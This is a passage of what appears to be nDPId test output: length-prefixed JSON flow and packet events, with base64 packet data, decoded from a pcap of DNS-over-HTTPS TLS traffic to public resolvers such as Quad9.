QC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"}
00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u